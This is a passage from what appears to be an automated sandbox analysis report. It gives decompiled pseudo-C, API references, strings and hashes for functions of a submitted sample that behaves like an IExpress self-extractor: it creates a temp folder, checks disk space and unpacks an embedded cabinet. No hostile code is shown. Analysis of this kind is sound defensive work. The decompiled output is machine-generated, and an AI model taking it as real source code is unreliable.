							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x1258b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E01255467(0x1258b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E012544B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E012544B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x1259124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E012544B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x1259124 = E01256285();
					L2:
					_t38 = 0;
				}
				L47:
				return E01256CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x012555ab
0x012555b2
0x012555c9
0x012555d5
0x012555d9
0x01255600
0x01255605
0x0125560a
0x0125560c
0x01255638
0x01255641
0x01255643
0x01255645
0x01255645
0x0125564c
0x01255652
0x01255657
0x01255659
0x01255696
0x0125569c
0x0125589f
0x012558a7
0x012558ac
0x012558b3
0x012558b5
0x012556a2
0x012556a2
0x012556a8
0x00000000
0x012556ae
0x012556ae
0x012556b9
0x012556bf
0x012556c1
0x012556f3
0x012556f3
0x01255705
0x0125570a
0x01255711
0x01255717
0x01255724
0x01255726
0x01255729
0x01255730
0x01255737
0x0125573d
0x01255740
0x00000000
0x00000000
0x00000000
0x00000000
0x0125572b
0x0125572b
0x0125572e
0x01255742
0x01255742
0x01255745
0x0125576b
0x0125576b
0x00000000
0x01255747
0x01255747
0x0125574d
0x0125574f
0x01255771
0x01255771
0x01255773
0x00000000
0x01255751
0x01255751
0x01255753
0x00000000
0x01255755
0x0125575b
0x01255760
0x01255762
0x00000000
0x01255764
0x01255764
0x01255769
0x0125577e
0x0125577e
0x01255781
0x01255788
0x0125578d
0x0125578f
0x012557b2
0x012557b8
0x012557bd
0x012557bf
0x012557cd
0x012557cd
0x012557dd
0x012557e3
0x012557ef
0x012557f5
0x012557f8
0x0125580a
0x0125580a
0x012557fa
0x01255802
0x01255802
0x0125580d
0x0125580f
0x01255830
0x01255836
0x0125583d
0x0125584b
0x01255851
0x01255855
0x0125585a
0x0125585c
0x00000000
0x0125585e
0x0125585e
0x00000000
0x0125585e
0x01255811
0x01255817
0x01255819
0x0125581f
0x00000000
0x0125581f
0x01255791
0x01255797
0x0125579c
0x0125579e
0x00000000
0x012557a0
0x012557a9
0x012557ae
0x012557b0
0x00000000
0x00000000
0x00000000
0x00000000
0x012557b0
0x0125579e
0x00000000
0x00000000
0x00000000
0x01255769
0x01255762
0x01255753
0x0125574f
0x00000000
0x00000000
0x00000000
0x0125572e
0x00000000
0x01255864
0x01255864
0x01255864
0x01255717
0x00000000
0x012556c3
0x012556c5
0x012556c9
0x012556ce
0x012556d0
0x00000000
0x012556d6
0x012556d6
0x012556d8
0x012556dd
0x012556df
0x00000000
0x012556e1
0x012556e2
0x012556e4
0x012556e6
0x012556eb
0x012556ed
0x00000000
0x012556f3
0x012556f3
0x00000000
0x0125586c
0x01255878
0x0125587e
0x01255882
0x01255883
0x01255889
0x0125588e
0x0125588e
0x00000000
0x01255896
0x012556ed
0x012556df
0x012556d0
0x012556c1
0x012556a8
0x0125565b
0x0125565b
0x0125565d
0x01255669
0x01255669
0x0125565f
0x0125565f
0x01255665
0x01255667
0x00000000
0x00000000
0x01255667
0x0125566c
0x01255673
0x01255678
0x0125567a
0x0125589b
0x0125589b
0x01255680
0x01255685
0x0125568c
0x00000000
0x0125568c
0x0125567a
0x0125560e
0x01255613
0x0125561a
0x01255620
0x01255626
0x00000000
0x01255626
0x012555db
0x012555e0
0x012555e7
0x012555f1
0x012555f6
0x012555f6
0x012555f6
0x012558b7
0x012558c7

APIs

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 012555CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01255638
LocalFree.KERNEL32(00000000), ref: 0125564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01255620

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Part of subcall function 01256285: GetLastError.KERNEL32(01255BBC), ref: 01256285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 012556B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0125571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01255737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 012557CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 012557EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01255802

Part of subcall function 01252630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01252654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01255830

Part of subcall function 01256517: FindResourceA.KERNEL32(01250000,000007D6,00000005), ref: 0125652A
Part of subcall function 01256517: LoadResource.KERNEL32(01250000,00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01256538
Part of subcall function 01256517: DialogBoxIndirectParamA.USER32(01250000,00000000,00000547,012519E0,00000000), ref: 01256557
Part of subcall function 01256517: FreeResource.KERNEL32(00000000,?,?,01252EE8,00000000,012519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01256560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01255878

Part of subcall function 0125597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 012559A8
Part of subcall function 0125597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 012559AF

Strings

msdownld.tmp, xrefs: 012557D3
Z, xrefs: 0125570A
A:\, xrefs: 012556F4
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012556AE, 012556B3, 0125583D
RUNPROGRAM, xrefs: 012555BD, 01255600
<None>, xrefs: 01255632

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1768447073
Opcode ID: f58c3bfc600cfd597aef830883ec8780f142aee3d51882588939f14dd215606e
Instruction ID: 8c573c59d8de2c692271ee8468943532e8306a565458e61fe5f6de6499c90980
Opcode Fuzzy Hash: f58c3bfc600cfd597aef830883ec8780f142aee3d51882588939f14dd215606e
Instruction Fuzzy Hash: 3D813D70A342169BDBF5AA35ACC9BFE76AD9F60344F040165EE86D3180EFB08DC18B50

Uniqueness

Uniqueness Score: -1.00%

Function 0125597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0125597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x1258004; // 0x958f311c
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x1259124 = E01256285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E012544B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x1259a34 & 0x00000008;
							if(( *0x1259a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x1259a38; // 0x0
								_t110 =  *((intOrPtr*)(0x12589e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x1259124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0125268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x1259a38; // 0x0
							_t110 =  *((intOrPtr*)(0x12589e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x12589e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x1259a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E012544B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x1259124 = E01256285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E012544B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x1259124 = E01256285();
					_t66 = 0;
					L33:
					return E01256CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0125597d
0x01255988
0x0125598f
0x0125599a
0x012559a6
0x012559a8
0x012559af
0x012559b9
0x012559dd
0x012559e4
0x012559f1
0x012559fe
0x01255a0b
0x01255a13
0x01255a19
0x01255a1b
0x01255ba1
0x01255baf
0x01255bbd
0x01255bd8
0x01255bde
0x01255be3
0x01255bec
0x01255bf0
0x01255bfc
0x01255c02
0x01255c02
0x01255c02
0x01255c04
0x01255c04
0x00000000
0x01255c04
0x01255a27
0x01255a3a
0x01255a46
0x01255a48
0x01255a4a
0x00000000
0x00000000
0x01255a64
0x01255a6a
0x01255a6c
0x01255abc
0x01255ac2
0x01255ac9
0x01255aca
0x01255aca
0x01255acc
0x01255acc
0x01255acf
0x01255ad1
0x00000000
0x00000000
0x01255ad3
0x01255ad6
0x01255ad8
0x00000000
0x00000000
0x01255ada
0x01255adc
0x01255add
0x01255add
0x01255ae0
0x00000000
0x00000000
0x00000000
0x01255ae0
0x01255ae2
0x01255ae4
0x01255ae6
0x01255ae6
0x01255ae6
0x01255ae9
0x01255aeb
0x01255af0
0x01255af6
0x01255af8
0x01255af9
0x01255af9
0x01255afb
0x00000000
0x00000000
0x01255afd
0x01255aff
0x01255b00
0x01255b03
0x00000000
0x00000000
0x00000000
0x01255b03
0x01255b05
0x01255b08
0x01255b20
0x01255b27
0x01255b52
0x01255b52
0x01255b5b
0x01255b62
0x01255b6b
0x01255b6d
0x01255b76
0x01255b7d
0x01255b83
0x01255b7f
0x01255b7f
0x01255b7f
0x01255b6f
0x01255b72
0x01255b72
0x01255b85
0x01255b98
0x01255b9e
0x01255b87
0x01255b8f
0x01255b8f
0x00000000
0x01255b85
0x01255b29
0x01255b33
0x00000000
0x00000000
0x01255b35
0x01255b48
0x01255b4a
0x00000000
0x01255b4a
0x01255b0f
0x01255b16
0x00000000
0x01255b16
0x01255a7c
0x01255a8a
0x01255aa5
0x01255aab
0x00000000
0x012559bb
0x012559c0
0x012559c7
0x012559d1
0x012559d6
0x01255c05
0x01255c14
0x01255c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 012559A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 012559AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 01255A13
MulDiv.KERNEL32(?,?,00000400), ref: 01255A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 01255A64
memset.MSVCRT ref: 01255A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01255A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 01255AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 01255BFC

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Part of subcall function 01256285: GetLastError.KERNEL32(01255BBC), ref: 01256285

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 2b25cd7e2d2e6860a2575384b67094ceba1a524472d6d6140ba979781dd7c96c
Instruction ID: 76c8089d7e29c38d3d9f729dcfe240c66c97567c938d94c3b6dcc6c906809274
Opcode Fuzzy Hash: 2b25cd7e2d2e6860a2575384b67094ceba1a524472d6d6140ba979781dd7c96c
Instruction Fuzzy Hash: A371C2B192031DAFEB669B64DCC9BFB77BCEB48344F4441A9E905D3144EA749E848F20

Uniqueness

Uniqueness Score: -1.00%

Function 01254FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E01254FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x1259144 = E0125468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x1259140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x1258584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x1258584, 0x841), 5); // executed
				}
				_t10 = E01254EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E01254CA0, E01254CC0, E01254980, E01254A50, E01254AD0, E01254B60, E01254BC0, 1, 0x1259148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x1259148; // 0x0
						_t24 =  *0x1258584; // 0x0
						E012544B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x1251140, 0, E01254CD0, 0, 0x1259140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x1258584; // 0x0
					E012544B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x1259140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x1259140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x12591d8; // 0x0
						if(_t47 == 0) {
							E012544B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x1258a38 & 0x00000001) == 0 && ( *0x1259a34 & 0x00000001) == 0) {
						SendMessageA( *0x1258584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x01254fe0
0x01254fe6
0x01254ff9
0x0125500d
0x01255013
0x0125501a
0x01255163
0x01255163
0x01255020
0x01255027
0x01255037
0x01255051
0x01255051
0x01255057
0x0125505e
0x012550a7
0x012550ad
0x012550b4
0x012550e8
0x012550e8
0x012550ee
0x012550ff
0x01255104
0x01255106
0x00000000
0x01255106
0x012550cd
0x012550d3
0x012550da
0x00000000
0x00000000
0x012550dd
0x012550e6
0x00000000
0x00000000
0x00000000
0x01255060
0x01255060
0x01255070
0x01255075
0x01255107
0x01255107
0x0125510e
0x01255111
0x01255117
0x01255117
0x0125511f
0x01255121
0x01255127
0x01255135
0x01255135
0x01255127
0x01255141
0x01255159
0x01255159
0x00000000
0x0125515f

APIs

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01254FFE
LoadResource.KERNEL32(00000000,00000000), ref: 01255006
LockResource.KERNEL32(00000000), ref: 0125500D
GetDlgItem.USER32(00000000,00000842), ref: 01255030
ShowWindow.USER32(00000000), ref: 01255037
GetDlgItem.USER32(00000841,00000005), ref: 0125504A
ShowWindow.USER32(00000000), ref: 01255051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01255111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01255159

Strings

CABINET, xrefs: 01254FE6, 01254FF7
*MEMCAB, xrefs: 012550C7

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: aa18d3b4732605e5fd10d47eccd79dd56e89141875b3edcc8386ed23a8ff697d
Instruction ID: 8f9e7c930366929105757976129ce8e3818130a698379c3d856431436c11a70a
Opcode Fuzzy Hash: aa18d3b4732605e5fd10d47eccd79dd56e89141875b3edcc8386ed23a8ff697d
Instruction Fuzzy Hash: 84319E70660312BBDBB15A67BDCFF777E5CA744759F048118FE05A3149EAB58C808B50

Uniqueness

Uniqueness Score: -1.00%

Function 012553A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E012553A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x1258004; // 0x958f311c
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0125171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E01251680(_t32, 0x104, _t20);
					E0125658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E01256CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x1258a20 = 1;
				goto L5;
			}

0x012553ac
0x012553b3
0x012553b9
0x012553bb
0x012553bd
0x012553bf
0x012553d1
0x012553d6
0x012553e0
0x012553e2
0x012553f5
0x012553fb
0x01255402
0x0125540b
0x00000000
0x00000000
0x01255413
0x00000000
0x00000000
0x01255415
0x01255416
0x01255427
0x0125542a
0x0125542b
0x01255434
0x01255434
0x0125543a
0x0125544c
0x0125544c
0x01255452
0x0125545a
0x00000000
0x00000000
0x0125545e
0x0125545f
0x00000000

APIs

Part of subcall function 0125171E: _vsnprintf.MSVCRT ref: 01251750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 012553FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0125542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 01255452

Strings

IXP, xrefs: 01255419
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012553B7, 012553E1, 0125541E
IXP%03d.TMP, xrefs: 012553C0

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-3062981759
Opcode ID: 0e705880d8bec9a5683dc3b0a62c6b98e086a19ee4d5678ac753a36cb2b2e6d2
Instruction ID: 8ec26d44f251192f35d10bcc1ba34f5224918522caf515dabb4e9d191c134cc7
Opcode Fuzzy Hash: 0e705880d8bec9a5683dc3b0a62c6b98e086a19ee4d5678ac753a36cb2b2e6d2
Instruction Fuzzy Hash: 7211047172120477E3A09F26ACCDFAF3A6DEFD1321F000129FA06D3180DE74894287A1

Uniqueness

Uniqueness Score: -1.00%

Function 01255467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01255467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x1258004; // 0x958f311c
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x12591e4;
					_t42 = 0x104;
					E01251680(0x12591e4, 0x104);
					L14:
					_t13 = E012558C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x1259124 = 0;
							_t14 = 1;
							L24:
							return E01256CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0125597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x1258a20; // 0x0
						if(_t61 != 0) {
							 *0x1258a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x1259124 = E01256285();
						goto L22;
					}
					 *0x1258a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E012553A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x12591e4;
				E01251781(0x12591e4, 0x104, __ecx,  &_v268);
				if(( *0x1259a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0125658A(_t48, 0x104, 0x1251140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
